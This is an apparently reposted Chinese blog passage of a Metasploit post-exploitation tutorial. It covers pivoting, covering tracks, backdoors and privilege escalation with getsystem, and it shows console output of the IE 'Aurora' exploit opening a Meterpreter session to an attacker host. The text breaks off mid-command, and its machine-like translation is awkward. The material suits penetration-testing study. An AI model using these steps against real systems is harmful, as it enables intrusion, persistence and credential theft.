Metasploit 后渗透攻击实战

一、Metasploit MSF Post后期开发

在努力成功“漏洞攻击/渗透”系统之后,我们接下来要做什么?

我们希望通过在我们从系统到系统的过程中转向并覆盖我们的轨道,进一步获得目标内部网络。笔试者还可以选择为其他潜在受害者嗅探数据包,编辑其注册表以获取更多信息或访问权限,或设置后门以保持更长时间的系统访问。

利用这些技术将确保我们保持一定的访问级别,并有可能导致深入到可信基础架构目标。

1、Metasploit 特权升级

通常,尤其是在客户端漏洞攻击方面,您会发现您的会话只具有有限的用户权限。这可能会严重限制您可以在远程系统上执行的操作,如转储密码,操作注册表,安装后门等。幸运的是,Metasploit有一个Meterpreter脚本'getsystem',它将使用许多不同的技术来尝试获取远程系统上的SYSTEM级权限。还有其他各种(本地)漏洞可以用来提升权限。

使用臭名昭着的'Aurora'漏洞,我们看到我们的Meterpreter会话仅作为普通用户帐户运行。

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600

msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting inte

猜你喜欢

转载自blog.csdn.net/qq_35029061/article/details/134567789
今日推荐